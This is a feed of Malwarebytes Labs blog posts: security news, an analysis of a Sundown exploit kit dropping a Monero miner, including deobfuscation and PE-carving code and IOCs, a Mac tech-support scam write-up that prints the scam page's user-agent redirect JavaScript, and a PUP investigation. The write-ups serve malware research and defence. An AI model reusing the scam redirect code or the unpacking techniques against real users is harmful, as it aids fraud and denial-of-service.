  • New Android Malware Attacks Your Wireless Router Through Your Phone. “There’s a new kind of Android malware that uses Android devices to attack wireless routers and control victims’ networks. The malware, which has been dubbed ‘Switcher Trojan,’ can leave victims vulnerable to a wide range of cyber attacks, phishing, data theft, and fraud. According to researchers at Kaspersky Lab, Switcher Trojan can redirect all traffic from devices connected to the WiFi network into the hands of cybercriminals. The Android malware infiltrates the wireless router’s admin interface with a predefined list of login and password combinations.” (Source: Mobile N Apps)
  • Fiat Chrysler And Google Team On Android In-car Tech. “Fiat Chrysler and Alphabet are already working together via Waymo, the former Google self-driving car project, and now Google is also teaming with the automaker for in-car system tech, using Android as the base for a new infotainment and connect car platform. The new FCA in-car system is called Uconnect, and uses Android 7.0 to deliver a range of features, including Android app compatibility alongside more traditional in-car controls like AC and heat, also with terrestrial radio.” (Source: TechCrunch)
  • Data Breaches Through Wearables Put Target Squarely On IoT In 2017. “Forrester predicts that more than 500,000 internet of things (IoT) devices will suffer a compromise in 2017, dwarfing Heartbleed. Drop the mic — enough said. With the sheer velocity of how the distributed denial-of-service (DDoS) attacks spread through common household items such as DVR players, makes this sector scary from a security standpoint.” (Source: CSO)
  • Latest WhatsApp Scam Infects Users With Banking Malware. “Hackers have started a new campaign in which they have chosen WhatsApp as the primary malware-distributing platform. In this campaign, hackers are distributing the malware through 2 files namely ‘NDA-ranked-8th-toughest-College-in-the-world-to-get-into.xls’ and ‘NIA-selection-order-.xls’ respectively. These files are being circulated via WhatsApp in the form of authentic word files obtaining sensitive information from users which include online banking credentials, PIN codes and similar details.” (Source: HackRead)
  • Ransomware Has Evolved, And Its Name Is Doxware. “In recent years, ransomware has become a growing concern for companies in every industry. Between April 2015 and March 2016, the number of individuals affected by ransomware surpassed 2 million — a 17.7% increase from the previous year. Ransomware attacks function by breaching systems, usually through infected email, and locking important files or networks until the user pays a specified amount of money.” (Source: Dark Reading)
  • Schools Warned About Cold-calling Ransomware Attacks. “Schools and colleges are being warned to be on the lookout for ransomware attacks, after a wave of incidents where fraudsters attempted to trick educational establishments into opening dangerous email attachments. In itself that doesn’t sound that unusual. What makes the attacks unusual, however, is just how the attackers tricked users into clicking on the malware-infected attachments. They phoned up their victims.” (Source: BitDefender’s Hot For Security Blog)
  • Experts Warn Of Novel PDF-Based Phishing Scam. “The SANS Internet Storm Center published a warning on Wednesday about an active phishing campaign that utilizes PDF attachments in a novel ploy to harvest email credentials from victims. According to the SANS bulletin, the email has the subject line ‘Assessment document’ and the body contains a single PDF attachment that claims to be locked. A message reads: ‘PDF Secure File UNLOCK to Access File Content.'” (Source: Kaspersky’s Threatpost)
  • $247,000 KillDisk Ransomware Demands A Fortune, Forgets To Unlock Files. “The cost of ransomware reached close to $1 billion in 2016, and it’s not hard to see why. The malware family, which targets everything from Windows to Mac machines, executes procedures to encrypt files and disks before demanding a ransom payment in return for keys to decrypt and unlock compromised machines. However, it is not only the general public which is being targeted with everything from hospitals to schools and businesses now in the firing line.” (Source: ZDNet)
  • Koovla Ransomware Urges Users To Read Up On Security. “Security researchers have discovered an unusual ransomware variant which offers a decryption key not if victims pay up, but if they read two articles on how to stay safe from malware. Discovered by self-styled ‘ransomware hunter’ Michael Gillespie, the ‘Koovla’ variant is still in development, according to Bleeping Computer’s Lawrence Abrams.” (Source: InfoSecurity Magazine)
  • Stolen Passwords Fuel Cardless ATM Fraud. “Some financial institutions are now offering so-called “cardless ATM” transactions that allow customers to withdraw cash using nothing more than their mobile phones. But as the following story illustrates, this new technology also creates an avenue for thieves to quickly and quietly convert stolen customer bank account usernames and passwords into cold hard cash. Worse still, fraudulent cardless ATM withdrawals may prove more difficult for customers to dispute because they place the victim at the scene of the crime.” (Source: KrebsOnSecurity)
  • Japan Sees a Spike In Smart TVs Held Hostage. “Looks like cybercriminals are starting to hit people where it really hurts: Blocking their bingeing on Netflix, and watching sports and an array of niche TV shows from the dark recesses of the cable network world. Smart TVs, in other words. Japan alone has reported more than 300 ransomware attacks on smart TVs this year, marking a sharp increase in cyberattacks targeting internet of things (IoT) appliances, according to Trend Micro. Typically, the affected TVs will be locked, and a ransom message pops up asking for 10,000 yen (around $100) to be paid within 72 hours.” (Source: InfoSecurity Magazine)
  • Social Media Security Is Not Just For Kids – How Safe Are Your Profiles? “The news is full of the risks children face on the internet, not just in terms of predators but also in terms of the rights they might be signing away. Their details and the rights to any images they post may be compromised, says a report from the UK’s Children’s Commissioner, entitled Growing Up Digital. The commissioner calls for clearer terms and conditions so that kids are aware of what they’re getting into. No reasonable person would disagree with that, but you can’t help wondering whether adults could do with some education in the area as well.” (Source: Sophos’s Naked Security Blog)
  • Unsecure Routers, Webcams Prompt Feds To Sue D-Link. “The Federal Trade Commission on Thursday sued Taiwan-based D-link in federal court. The FTC alleges that D-link routers and webcams left ‘thousands of consumers at risk’ to hacking attacks. ‘Defendants have failed to take reasonable steps to protect their routers and IP cameras from widely known and reasonably foreseeable risks of unauthorized access, including by failing to protect against flaws which the Open Web Application Security Project has ranked among the most critical and widespread web application vulnerabilities since at least 2007,’ the FTC said in a complaint (PDF) filed in San Francisco federal court.” (Source: Ars Technica)

Safe surfing, everyone, and welcome, 2017!

The Malwarebytes Labs Team

Categories: Techie Feeds

The curious case of a Sundown EK variant dropping a Cryptocurrency Miner

Malwarebytes - Sat, 01/07/2017 - 01:29

This post was authored by @hasherezade and Jérôme Segura

We recently encountered an atypical case of Sundown EK in the wild – usually the landing page is obfuscated, but in this case there was plain JavaScript. The exploit was dropping some malicious payloads that we took for further analysis. It turned out that they are also atypical in many ways. In this article, we will describe the details of our investigation.

Exploit Kit

This exploit kit has a different serving infrastructure than what we are used to seeing, but it is essentially the same Sundown EK that we know.

In comparison, here’s a fresh Sundown EK using steganography, where we can see that both EKs share the same Flash exploit.

The landing page for this variant has almost no obfuscation, which was a bit of an oddity:

The infrastructure for pushing this EK relies on a few domains all hosted on the same IP address:

The payload URL (pastetext.biz) is also tied to the same EK distributor, hinting at a single actor operation.

Payload – Cryptocurrency miner

Analyzed samples

Behavioral analysis

The application does not use any special trick in order to hide itself. It only tries to mislead the user with its process name. In the analyzed case it was called “Windows Backup”:

We can see it establishing some internet connection:

The network communication is pretty straightforward – everything goes in the clear.

First, the application connects to Pastebin and retrieves a stored note that seems to be a set of parameters for some application. Looking at the link and keywords, we can easily guess that it is related to mining cryptocurrency:

Then, it logs itself into the service using login: ‘lovemonero2.worker@hotmail.com’ and a password ‘x’:

Unpacking

The initial sample is a 64-bit PE file. During the initial assessment we found that it is packed by UPX, so I removed this layer using a standard UPX decompressor. As a result, I got the following PE file – with 3 resources:

I started by having a look at the resources, because they often contain (encrypted) payloads. In the current case, all of them had a structure resembling PE files – just slightly obfuscated:

See the suspicious string from the dumped resource file:

M."Uijt!qsphsbn!dboopu!cf!svo!jo!EPT!npef

It resembles the string typical of the DOS stub:

L.!This program cannot be run in DOS mode

It was easy to deduce what method of obfuscation was used there – the value 1 was added to each ASCII character. Knowing this, it was easy to write a decoding function, i.e.:

    def decode(data):
        maxlen = len(data)
        key = 1
        decoded = bytearray()
        for i in range(0, maxlen):
            dec = (data[i] - key) & 0xFF   # subtract 1 from each byte, wrapping at 0
            decoded.append(dec)
        return decoded

As a result we got 3 PE files (each of them starts after the data appended at the beginning):

Two of them were legitimate DLLs: MSVCR120.dll – 32-bit and 64-bit versions. The remaining PE file was the real payload – again UPX compressed. We unpacked it without any problems with the help of the original tool:
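The two steps described above (undoing the byte+1 obfuscation, then locating the PE image that starts after the junk prefix) as one worked example; this is added code, not the post’s own script. The sample resource it operates on is constructed inside the block and is only a PE-shaped stub, not a real executable; the helper names (`encode`, `carve_pe`, `pe_machine`, `build_fake_resource`) are this example’s own.

```python
import struct
from typing import Optional

# Added example, not the original post's code. It implements the two steps the
# post describes: undo the "add 1 to every byte" obfuscation of the dropped
# resources, then carve the embedded PE that starts after the junk prefix, and
# finally read the COFF Machine field to tell the 32-bit DLL from the 64-bit one.
# The sample resource built by build_fake_resource() is constructed test data,
# NOT a real executable.

IMAGE_FILE_MACHINE_I386 = 0x014C    # 32-bit PE
IMAGE_FILE_MACHINE_AMD64 = 0x8664   # 64-bit PE


def encode(data: bytes, key: int = 1) -> bytes:
    """Apply the dropper's obfuscation: add `key` to every byte (wrapping at 0xFF)."""
    return bytes((b + key) & 0xFF for b in data)


def decode(data: bytes, key: int = 1) -> bytes:
    """Reverse the obfuscation: subtract `key` from every byte (wrapping at 0)."""
    return bytes((b - key) & 0xFF for b in data)


def find_pe_offset(blob: bytes) -> int:
    """Locate the first 'MZ' header whose e_lfanew field points at a PE signature.

    Returns the offset of that DOS header, or -1 if the blob holds no PE image.
    A plain search for 'MZ' is not enough: the two bytes can occur by chance in
    the junk prefix, so the e_lfanew pointer (DOS header offset 0x3C) is
    validated against the 'PE\\0\\0' signature it should point at.
    """
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            pe_sig = pos + e_lfanew
            if pe_sig + 4 <= len(blob) and blob[pe_sig:pe_sig + 4] == b"PE\0\0":
                return pos
        pos = blob.find(b"MZ", pos + 1)
    return -1


def carve_pe(resource: bytes) -> Optional[bytes]:
    """Decode an obfuscated resource and return the embedded PE image (prefix stripped)."""
    decoded = decode(resource)
    offset = find_pe_offset(decoded)
    return None if offset < 0 else decoded[offset:]


def pe_machine(pe: bytes) -> str:
    """Read the COFF Machine field (4 bytes past the PE signature) to classify the image."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    machine = struct.unpack_from("<H", pe, e_lfanew + 4)[0]
    names = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}
    return names.get(machine, hex(machine))


def build_fake_resource(prefix: bytes = b"\x00\x11\x22\x33") -> bytes:
    """Construct a minimal PE-shaped stub behind a junk prefix and obfuscate it like the dropper.

    Only the DOS header, DOS stub text, PE signature and Machine field are present;
    this is constructed input for the carver, not a loadable executable.
    """
    stub = b"This program cannot be run in DOS mode\r\n$"
    dos_header = bytearray(0x40)
    dos_header[0:2] = b"MZ"
    struct.pack_into("<I", dos_header, 0x3C, 0x40 + len(stub))   # e_lfanew -> PE signature
    image = bytes(dos_header) + stub + b"PE\0\0" + struct.pack("<H", IMAGE_FILE_MACHINE_AMD64)
    return encode(prefix + image)


if __name__ == "__main__":
    # The obfuscated DOS-stub string quoted in the post decodes to the familiar text.
    print(decode(b"Uijt!qsphsbn!dboopu!cf!svo!jo!EPT!npef"))
    carved = carve_pe(build_fake_resource())
    print(carved[:2], pe_machine(carved))
```

On a real dump, feed each resource to carve_pe() and write the returned bytes to disk; the MZ/e_lfanew validation is what lets the junk bytes at the start of each resource be skipped safely.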

Curious links

A quick look at the strings referenced by the binary revealed various commands that explain the tool’s purpose:

We can easily guess that it is meant for mining some cryptocurrency (the default guess is Bitcoin – but is it really?).

As well as some curious links:

Following the links led me to a Pastebin account for a user called “LoveMonero”:

And more interestingly, to his Github account:

The name of the user – LoveMonero – suggests that this application is not used to mine Bitcoins, but another cryptocurrency – Monero. This choice makes sense, because the pool of bitcoins is more and more saturated – and nowadays mining them is much more difficult and resource-consuming than it was in the past, when this currency was still young.

He stored there not only the source code of the tool, but also links with parameters (the same as at Pastebin and in the binary).

The file was edited just 4 hours ago – which means it is still fresh and actively maintained.

In the same repo, we can find even the links from where the malware was downloaded during the campaign!

We can see that it is exactly the same link that was used by the Exploit Kit:

Linked executables:

As it turns out, the project is based on an open-source tool for mining cryptocurrencies: ccminer-cryptonight. However, there are some modifications.

Fetching the repository, we can find all the commits starting from 20th November 2016:

The initial e-mail (possibly with the real data of the actor) was changed to the familiar name – lovemonero:

Inside the code we can find the same strings that are referenced in the dropped payload, confirming the guess that this code is related to the dropped application:

From the binary:

However, the stored source code doesn’t seem to be complete.

Conclusion

This campaign looks strange to us due to the fact that it has been prepared in an extremely careless way. There were a lot of traces stored in the application as well as the Github profile.

Since the release of some open-source code of DDoS tools (Mirai) and ransomware (HiddenTear, Eda2) we can see the trend that more and more novices are trying their luck in cybercrime. This application is yet another example of this tendency.

IOCs:

Domains:


IPs:

149.202.164.86
158.69.87.196
158.69.86.203

Registrant Emails:

lovemonero@gmail.com
davidgreenwoodjazz@gmail.com

Flash exploit:

67d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6

Categories: Techie Feeds

Tech support scam page triggers denial-of-service attack on Macs

Malwarebytes - Thu, 01/05/2017 - 15:00

Tech support scammers have been using various themes to push fake alerts to scare users into calling for assistance. These fall into the ‘browlock’ category if they are via the browser and into the screen lockers category if they are actual malware that runs on the system.

Recently, there has been a trend for scammers to cause denial-of-service attacks against people’s computers. We documented it in early November with a specific HTML5 API (history.pushState) which caused the browser to freeze. Today we take a quick look at yet another technique that targets Mac OS users running Safari.

A newly registered scam website targeting Mac users was making the rounds late last year. Simply visiting the malicious site on an older version of macOS would start creating a series of email drafts, which eventually causes the machine to run out of memory and freeze.

The malicious webpage will first determine the version of OS X via a user agent check and push two different versions of this denial-of-service (10 or 11):

    if ((navigator.userAgent.match(/OS 10.1.1/i))) {
        location.replace("http://safari-get.com/11.php");
    } else if ((navigator.userAgent.match(/OS 10.2/i))) {
        location.replace("http://safari-get.com/11.php");
    } else {
        location.replace("http://safari-get.com/10.html");
    }

The first variant (10.html) has code that will keep drafting emails (but does not actually send them) incrementally and cover the previous open windows.

The second variant (11.php) will instead open up iTunes:

These flaws may have been fixed with macOS Sierra 10.12.2 as Mac users running a fully up-to-date OS do not seem to be affected by the Mail app DoS:

However, the second variant appears to still be capable of opening up iTunes, without any prompt in Safari:

Thanks to @TheWack0lian for pinging me back about this scam site and its DoS feature.

IOCs:

  • safari-get[.]com
  • safari-get[.]net
  • dean.jones9875@gmail.com
  • safari-serverhost[.]com
  • safari-serverhost[.]net
  • amannn.2917@gmail.com
Categories: Techie Feeds

Closing the gender gap in tech with RGSoC

Malwarebytes - Wed, 12/28/2016 - 17:00

The last couple of years saw a growth in diversity- and women-focused tech events and programs; suddenly, everyone seems to be worried about diversity in our industry. But why is diversity in technology something we should care about?

According to a study from the National Center for Women and Information Technology, in 2015 only 25% of computing occupations across the U.S. were held by women, in spite of women making up approximately 50% of the population. This number has been declining since the early 1990s, and is an even more frightening statistic when we think of the history of computing and the meaningful roles women had in Computer Science in the past: From the ENIAC operators of the 1940s to the developers of the Smalltalk language in the 1970s, women were a consistent part of information technology in the last century.

This diversity in technology is extremely important. Diverse teams, comprised of people with diversified social identities, benefit from diverse perspectives when solving a problem, often leading to innovation or to the acquisition of a new market. There is also a myriad of examples where lack of diversity in teams or industries had negative repercussions: the Apple watch not working properly for users with tattoos, Flickr’s offensive and racist auto-tagging system, and a 2006 United Nations audit of Web Accessibility showing that out of 100 websites surveyed, only three met the basic standard for accessibility.

With RGSoC, we aim to close the gender gap in tech. While there are many ways to try and do so — workshops, bootcamps, and conferences aimed primarily at women — we have decided to focus on the long-term goal of bringing more women into Open Source, by supporting them with 3-month scholarships to work on an Open Source project in teams of two. Our program doesn’t just support women financially, but also offers a network of mentors, coaches, supervisors, coaching companies and alumnae who give general support and guidance on various topics: code, time management, and self-care. One way in which we measure the success of our program is by how many of our past participants come back to the program (as coaches and mentors) and give back to the community; RGSoC is built on a community of people who care for and support each other and focuses on providing more role models for women learning to code.

As found in many surveys (like the UK-based GirlGuiding Girls’ Attitudes Survey) and stated in several articles (see Forbes’ recent article on female execs), role models are exactly what many of the women entering the STEM workforce—or many of the girls considering a career in tech—lack. In spite of this lack of role models and in spite of the stereotype that men are better at technical jobs, in many cases women tend to outperform men in this field. First Round Capital’s research on 300 portfolio companies showed that female-founded startups do better than all-male startups; so do companies with three or more women in top management functions, according to a 2007 research project by McKinsey&Company. Unfortunately, when women or members of underrepresented groups outperform, it is often the result of trying to balance out unconscious bias, so being aware of our own biases and realizing that the above facts exist are only two of the many steps needed to improve our industry for everyone. Because representation is important, we need to break stereotypes—and programs like RGSoC allow us to do so, one edition at a time.

 

Laura Gaetano

Rails Girls Summer of Code

Categories: Techie Feeds

Mobile Menace Monday: Safe Practices with Your Mobile Device

Malwarebytes - Mon, 12/26/2016 - 17:06

‘Tis the season for gift giving, and who wouldn’t be excited about receiving a brand new mobile device! Before you start loading your new device with various apps, here are a few safe practices to make sure your holidays stay malware-free:

Install apps from safe locations, most notably the Google Play Store.

Google Play is the safest place by far to install Android apps.

Now I know what some of you are thinking: You wanted an Android device because you’re not restricted to just one app store.

If you must install elsewhere, make sure you do your research and install from highly-rated app stores that have security measures in place to keep it clean from malicious apps.

Many apps can also be installed from the app’s company website. Once again, do your research about the company and its apps before installing.

Check permissions of apps before installing.

This is especially true if you are installing from third-party app markets. Do the permissions seem fitting for what the app needs to function? If that wallpaper app of cute kittens has SMS permissions, you may want to think twice.

If it looks too good to be true, it probably is.

It goes back to the old saying “you get what you pay for”.

There are many popular apps on Google Play for free, but it’s under the agreement that you will have to view advertisements in order to use them. If you’re okay with that, then install away.

Many of these popular apps can also be found on third-party app markets, but be aware that there are shady app markets with apps that contain more than just advertisements.

If you really want a safe and ad-free app, it might just be worth paying the 99 cents and avoid all the hassle.

Protect yourself with a good malware scanner, like Malwarebytes Anti-Malware Mobile.

Call it a shameless plug if you like, but the reality is that malware is becoming more prevalent on mobile devices.

Even with being cautious, malware infections do happen. It’s best to have a layer of protection to stay safe out there. You can find our Malwarebytes Anti-Malware Mobile app on Google Play. And guess what, it’s free of cost and advertisements!

Don’t let the bad guys ruin your fun. Follow these simple tips and keep your Android device safe from infection.

Nathan Collier

Categories: Techie Feeds

Why Malwarebytes detects PC Pitstop as Potentially Unwanted

Malwarebytes - Thu, 12/22/2016 - 16:37

At Malwarebytes, we take great pride in the fact that we’re protecting customers – not just from malware – but from a growing and worrisome threat known as PUPs, or Potentially Unwanted Programs. We recently strengthened our PUP detection criteria due to PUP vendors becoming more aggressive while at the same time using more polished scare tactics to push users into purchasing their products. One company that we started investigating was PC Pitstop. With transparency being important to us at Malwarebytes, the intent of this blog is to make the facts public.

PC Pitstop makes several products including PC Matic, PC Magnum, Optimize, Driver Alert, and Disk MD. As of a few weeks ago, we detect these products as PUP.Optional: the first part indicating a Potentially Unwanted Program and the second that removal is optional, meaning we believe it is unwanted by the majority of users and yet we want it to be clear that it is your discretion as a user to remove it.

PC Pitstop triggered several of our PUP criteria, which I’ve included below.

  1. Claiming that registry cleaning is necessary

Some programs offer to clean or modify your computer’s registry. In basic terms, your Windows registry contains information and settings for the programs and hardware installed on the operating system.

According to Microsoft, registry cleaners are not necessary. In fact, Microsoft itself does not recommend the use of registry cleaners. Products that use registry cleaning and optimization as a feature to drive sales are considered Potentially Unwanted by Malwarebytes.

PC Pitstop’s Optimize & PC Matic products use registry cleaning as one of their main features. They will show registry issues, even on a brand new computer. It states there are fourteen registry files which “may cause improper operation of some applications.” Based on standards from Microsoft, we believe this to be an aggressive tactic to drive sales.

Figure 1: PC Pitstop’s Optimize showing problems on a brand new machine and prompting users to “Buy Now!” in order to “fix the problems identified.”

Figure 2: PC Matic registry cleaning recommendations.

  2. Claiming that temporary files are problematic

Another one of our PUP detection criteria is flagging temporary files created by the operating system or Internet browser as high risk issues or urgent fixes for a non-savvy user. Temporary files are normal artifacts of the operating system and browser and are in no way indications of a problem with the computer or an issue that is urgent. These detections are normally accompanied by a red dot or risk slider.

PC Pitstop’s PC Matic shows temporary files as urgent issues to the user, even on a brand new computer.

Figure 3: PC Pitstop’s PC Matic showing temporary files, default Operating System settings and disk fragmentation as “issues with your PC” on a brand new machine and prompting users to buy in order to “Fix All.”

  3. Claiming that cookies are problematic

Browser cookies are an integral part of how browsers work. For example, when you buy something online, the shopping cart is more likely than not driven by browser cookies. Flagging browser cookies as an issue that requires immediate attention is an aggressive tactic used by many Potentially Unwanted Programs.

  4. No working trial

During investigation of PC Pitstop products, we were prompted many times (after displaying the aforementioned issues!) to buy the software. There is no working trial and the cost of the product was up to $150. High prices without the ability to trial the software contribute to our criteria around Potentially Unwanted Programs.

  5. Silent removal of necessary applications

One of the most shocking behaviors of PC Matic was the prompt to remove necessary applications such as Google Chrome’s updater, Java’s updater, and more. Removing these components actually puts the machine at risk, as both of the updaters mentioned deliver patches for critical vulnerabilities.


Figures 4 & 5: PC Matic prompts to remove necessary components that keep applications up to date.

Figure 6: PC Matic showing the Google Chrome Media Router plugin as “Bad”. This plugin ships by default with the standard installation of Google Chrome.

Figure 7: PC Matic disabling the Google Update services, leaving the machine potentially vulnerable and out of date.

  6. Silently disabling the Windows Defragmentation Service

As shown above in figure 2, PC Matic identifies disk fragmentation on a brand new computer and prompts the user to purchase the product. We have found that during installation of PC Matic, one of the first actions it performs is silently disabling the Windows Defragmentation Service. The problem is that the Windows Defragmentation Service is no longer just a defragmenter; it is more of a weekly low-level cleanup of the hard drive for things the operating system tosses around. Microsoft highly suggests leaving this alone for Windows 8 and above. In fact, Microsoft says that stopping this service can do more harm than good.

Once the built-in Windows Defragmentation Service is disabled, PC Matic promotes its “SSD Optimization” feature that shows the Scheduled Defragmentation service as disabled.

Figure 8: PC Matic disabling the Windows Defragmentation Service

Figure 9: PC Matic’s “SSD Optimization” consists of disabling the Microsoft defragment service which Microsoft advises against.

  7. Silently performing other potentially dangerous actions

There are other changes made to the machine running PC Matic fixes that could be potentially dangerous, such as silently adding an administrative user.

Figure 10: PC Matic silently adding an administrative user account to the machine.

  8. High risk security vulnerabilities

On top of all of the behaviors listed above, Malwarebytes has found a series of critical vulnerabilities in PC Pitstop’s products that can allow any attacker to take control of your machine. We advise all PC Pitstop users to immediately uninstall any and all PC Pitstop products from their computers until the vulnerability is resolved. We have sent details of the vulnerabilities found to PC Pitstop so they can address them immediately.

We use our best judgment and a list of criteria we’ve seen abused in the past to determine whether software should be flagged as Potentially Unwanted for our users. No company and no software is perfect, Malwarebytes included. We hope PC Pitstop takes action to remediate the issues listed above, at which point we will immediately stop flagging their products for potential removal. We are humbled that our users trust us to keep them safe and we will aggressively defend our stance against the detection of PC Pitstop’s products until that time.

Categories: Techie Feeds

Malwarebytes teams up with America SCORES

Malwarebytes - Wed, 12/21/2016 - 17:00

Malwarebytes was proud to participate in America SCORES Bay Area’s Corporate Cup this winter. The local non-profit helps provide after school soccer and poetry programs at public schools in low-income communities. We found ourselves front and center to the poet-athletes’ poetry reading and spectated their friendly match up.

As a company we strive to promote healthy living by participating in fitness, nutrition, and mental health challenges. Promoting a healthy and positive lifestyle not only for our company, but supporting the same ideals with America SCORES, made it a no-brainer to join the tournament. In many of the communities the poet-athletes only have asphalt to play soccer on, which can be dangerous and chaotic. With that challenge in mind, they started turning asphalt to turf with their Field of Dreams project.

Malwarebytes is happy to donate to America SCORES Field of Dreams and extends the opportunity to contribute this holiday season. For less than $10 a square foot, they can turn the page on unsafe asphalt playgrounds and create a safe environment for the poet-athletes.

Thank you, America SCORES Bay Area, and we can’t wait for the next tournament!

Christina Lopez

Categories: Techie Feeds

Vetting your vendors: money isn’t everything

Malwarebytes - Tue, 12/20/2016 - 17:00

Over the past year, we’ve seen a handful of cyber threat intelligence vendors sputter out. Some with a flood of defensive lawsuits, some charged with not really doing much of anything, and one that ended with a dramatic FBI raid and numerous charges of hacking and extortion. What’s concerning from a CSO’s perspective is the veneer of legitimacy all these companies had; scammy cybersecurity companies generally have slick, professional websites, convincing sales engineers, legions of onshore support executives, and almost invariably, one or more executives with ties to a government intelligence agency, whether in the US or abroad. So given that almost all cybersecurity companies on the market strive to project an image of the quiet professional, how can a CSO sort out companies that are a value add from those with a less than legitimate business model? And what about the companies that are above board, but just not very good? Let’s take a look.

The Ugly

Most harmful to a business in the long run are the security vendors who either don’t do much of anything, or have a business model that skirts the edge of the law. The simplest and most cost-effective way of avoiding these companies is doing a community temperature check. Bad vendors tend to acquire a collective disapproval in the infosec community long before their business model fails. A quick Twitter or Google search of the vendor name can often reveal detailed accounts by analysts who have used them and can provide candid assessments.

But the gold standard for a temperature check is to ask your own team. Cross-pollination of infosec personnel is at an all-time high – as such, your team most likely has a broad range of experience with multiple vendors on a host of platforms. Your team can provide invaluable data, like added operations costs over the long term, company billing practices, and interoperability with existing systems. They can also tip you off on issues with vaporware, generally defined as giving the appearance of having a product which is in reality much more limited or even non-existent.

Like most vendors of higher quality, the ugly will also have former intelligence agency personnel to give themselves a veneer of authority and competence. A question that rarely gets asked, though, is “Which agency?” Is it an agency with a formal mandate for addressing cyber threats, with an established university pipeline and well regarded reputation? Is it an agency whose cyber division was stood up relatively recently, with repurposed employees from other departments? Further, how relevant is that experience to your business needs? If the majority of your security losses are coming from phishing and malvertising, is having access to analysts experienced in state sponsored intrusions really relevant?

The Bad

Some infosec vendors really do try their best to provide a valuable product to the end user…but fall awfully short of the mark most of the time. The problem here isn’t that they’re not trying to deliver a good product – it’s that they don’t necessarily understand what ‘good’ is to you. In the public sector, intelligence is often defined as information that is timely, accurate, and relevant. This applies to cyber threat intelligence as well. If you kick out any one of the legs on the threat intelligence tripod, you’re left with a platform too unstable to make any reliable judgement on cyber risk. An organizational threat delivered to SOC personnel in a timely manner that hasn’t been vetted (i.e. inaccurate) is not intelligence. Threat data that is timely and accurate, but not adapted to your business vertical (i.e. irrelevant) is not intelligence. What these things amount to tends to be a drag on organizational resources as in-house security personnel get tasked with vetting ever increasing quantities of data that doesn’t address business needs. Don’t those tier two SOC techs have better things to do than retrace vague, un-targeted analysis?

Bad cyber threat intel vendors often correctly identify the desired end goal of intelligence, but lack an understanding of appropriate methodology. Again, these companies often out themselves as undesirable with a quick community check. A poorly sourced, unreviewed report using inflated claims will quickly reveal itself as such as the infosec community reviews the content. Timely, accurate, and relevant threat data will be shared, retweeted, and commented upon much more frequently than less useful sources. Pausing for a moment to see how other organizations have integrated threat data being offered to you can provide a valuable check against letting a bad vendor slip through the cracks.

Some questions to ask the sales engineer:

  • How will this data be tailored to my organization?
  • How is the data delivered to us, and if it’s a portal, what is your upgrade release schedule?
  • And most importantly: How do you vet your sources?

Note: do not accept “We have to protect our sources and methods.” This is a phrase borrowed from government intelligence, which generally uses it in situations involving threats to human lives. More commonly, it’s used to express sentiments akin to “I’m not going to tell you because I don’t want to, don’t know, or it would embarrass me.”

The Good

Here’s the most difficult category and the holy grail for augmenting your security team: a company that delivers well-targeted services to your organization in a manner that is timely, accurate, and relevant. The catch here is that to properly spot the good company, your own organization has to have timely, accurate, and relevant defined down to a T. This brings us to the last and most important aspect of vetting: metrics.

Certain companies can provide an awfully impressive “real time demonstration” of the product, sometimes offering you a head to head with competing products. They might reference number of threats detected, speed of detections, or analysis, or number of endpoints providing data. There is a barrage of cybersecurity metrics available to benchmark performance, so how do you know which are valuable? The answer is none of them. The only metric relevant to evaluate security performance is that which has been generated by your own team against a mature risk tolerance posture. Vendor metrics can’t possibly address the various risk tolerances of all their customers and therefore can’t be relevant to how they would perform for you. Once you know your own metrics, evaluating vendors can be a piece of cake. (And requires much fewer meetings.)

Some questions to ask the relationship manager for a great vendor:

  • How can I share feedback from my security team?
  • When can we revisit my business needs?
  • What improvements do you have planned for next quarter?

To sum up, vetting vendors doesn’t have to be painful – if you know your risk tolerance posture, and have a mature communication channel with your own security team.

Categories: Techie Feeds

A week in security (Dec 11 – Dec 17)

Malwarebytes - Mon, 12/19/2016 - 20:49

Malwarebytes released our annual list of predictions for the year 2017. We claimed that ransomware will remain king—and personal. We also shared our thoughts on exploit kits, the Internet of Things (IoT), password managers, and security in general.

Last week, we homed in on tech support screen lockers, particularly VinCE, provided our opinion on a ransomware campaign that encourages people to infect two more in order to get their decryptor, and provided a deep analysis of Goldeneye, the rebranded Petya/Mischa partnership.

And finally, we looked into a scam-in-a-box company that offers intelligence leads.

Below are notable news stories and security-related happenings:

  • Exclusive: DHS Says Georgia Hack May Have Been Rogue Employee. “The Department of Homeland Security told members of congress Friday that a rogue federal employee may have been responsible for a November hack-attack that targeted the Georgia secretary of state’s system, LifeZette has learned. On Friday afternoon DHS initiated a conference call with members of Georgia’s congressional delegation to discuss the cyber-attack, a Capitol Hill staffer with knowledge of the call told LifeZette.” (Source: LifeZette)
  • Webroot Sheds Light On The Short, Sharp Lifecycle Of Phishing Websites. “Phishing websites have shorter lifecycles than ever before, but their numbers are becoming much more prevalent – and Google, PayPal, Yahoo and Apple are the main targets, according to new Quarterly Web Update findings from Webroot. 84% of phishing sites exist for less than 24 hours, and the average life cycle is less than 15 hours, the company found. However, an average of more than 400,000 phishing sites are cropping up each month, and most of those are hidden within unused domains.” (Source: Security Brief Asia)
  • Yahoo Patches Critical XSS Vulnerability That Would Allow Hackers To Read Any Email. “Yahoo, which was in the limelight for revealing a massive hack on its users earlier this year, has fixed a highly critical cross-site scripting (XSS) security flaw in its email system that would have allowed attackers to access any email. The flaw was discovered and reported by Finland-based security researcher Jouko Pynnonen who earned $10,000 for the feat from Yahoo’s bug bounty program. The flaw allowed an attacker to read a victim’s email or create a virus infecting Yahoo Mail accounts among other things.” (Source: The Mirror)
  • Thieves Using Radio Jammers To Prevent Drivers From Locking Their Cars. “British police are warning drivers to check their doors after they use their remote key to lock their car because thieves may be using jammers to block door locking signals, leaving the vehicles unlocked. Thames Valley Police says that thieves have entered and stolen goods from 14 cars parked at motorway (highway) services stations.” (Source: Bleeping Computer)
  • Scammers Can Trick Microsoft Edge Into Displaying Fake Security Warnings. “Hopefully, by now, many readers will be aware of the scam messages that can pop up on your computer screen telling you that your computer may be at risk, and to call a special number for ‘technical support’. Of course, the scam warnings are not legitimate and the person you are calling is not a real Microsoft support engineer. And yet, many computer users have been fooled into making contact, and ended up either with an expensive and unnecessary bill or granting hackers access to their PC. The scams are more successful for the fraudsters the more convincing that their warning appears.” (Source: Bitdefender’s Hot For Security Blog)
